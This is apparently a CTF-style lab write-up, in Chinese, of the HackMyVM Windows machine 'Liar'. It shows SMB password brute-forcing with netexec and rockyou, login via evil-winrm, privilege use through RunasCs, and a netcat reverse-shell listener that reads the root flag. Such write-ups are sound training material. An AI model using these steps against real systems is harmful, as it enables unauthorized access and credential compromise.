[hmv] Liar.md
[hmv] Liar.md
information
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-01 18:56 CST
Nmap scan report for 192.168.1.247
Host is up (0.028s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-01T10:56:38
|_ start_date: N/A
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:1d:0f:fe (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.93 seconds
看看80端口开了什么。 
80端口截图
获得一个用户名nica
user1
考虑从445入手,爆破nica的密码。
1
2
3
4
5
6
7
8
9
╭─bamuwe@Mac ~/Desktop
╰─$ netexec smb 192.168.1.247 -u 'nica' -p ~/Documents/rockyou.txt --ignore-pw-decoding
etc...
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:sexymama STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:crazy STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:valerie STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:spencer STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:scarface STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\nica:hardcore
得到了user1: nica / hardcore 直接登录。
1
2
3
4
5
6
7
8
9
10
11
╭─bamuwe@Mac ~/Desktop
╰─$ evil-winrm -i 192.168.1.247 -u 'nica' -p 'hardcore' 130 ↵
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nica\Documents>
查看域内其他用户:
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\nica> net user
Cuentas de usuario de \\
-------------------------------------------------------------------------------
Administrador akanksha DefaultAccount
Invitado nica WDAGUtilityAccount
El comando se ha completado con uno o m s errores.
user2
发现一个akanksha用户,仍然是爆破密码。
1
2
3
4
5
6
7
8
9
10
11
12
╭─bamuwe@Mac ~/Desktop
╰─$ netexec smb 192.168.1.247 -u 'akanksha' -p ~/Documents/rockyou.txt --ignore-pw-decoding
SMB 192.168.1.247 445 WIN-IURF14RBVGV [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:123456 STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:12345 STATUS_L
etc...
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:snowman STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:romero STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:madelineSTATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:dulce STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\akanksha:turkey STATUS_LOGON_FAILURE
SMB 192.168.1.247 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\akanksha:sweetgirl
得到了user2: akanksha / sweetgirl
system
看了wp提示要使用RunasCs.exe这个程序。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
*Evil-WinRM* PS C:\Users\nica\Desktop> C:\Users\nica\Desktop\RunasCs.exe akanksha sweetgirl "cmd /c whoami /all"
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
INFORMACI…N DE USUARIO
----------------------
Nombre de usuario SID
======================== ==============================================
win-iurf14rbvgv\akanksha S-1-5-21-2519875556-2276787807-2868128514-1001
INFORMACI…N DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
============================================ ============== ============================================== ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESI…N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compaÏa Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci½n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192
INFORMACI…N DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci½n Estado
============================= ============================================ =============
SeChangeNotifyPrivilege Omitir comprobaci½n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
查看akanksha,发现是administrator组,使用这个用户反弹shell。
1
2
3
4
5
6
7
8
9
10
11
12
13
╭─bamuwe@Mac ~/Documents/RunasCs/1.4
╰─$ rlwrap nc -lvnp 1234
Connection from 192.168.1.247:49720
Microsoft Windows [Versin 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>
...etc
C:\Users\Administrador>type root.txt
type root.txt
HMV1STWINDOWZ
conclution
- 细节上的信息收集非常重要,例如网站上的用户名等。
- 枚举是一项非常重要的技能,尤其是在ad环境,可以多使用枚举。
- 应用程序的运行受限于环境版本,如果当前程序不可用,可以尝试用老的适用版本。
This post is licensed under CC BY 4.0 by the author.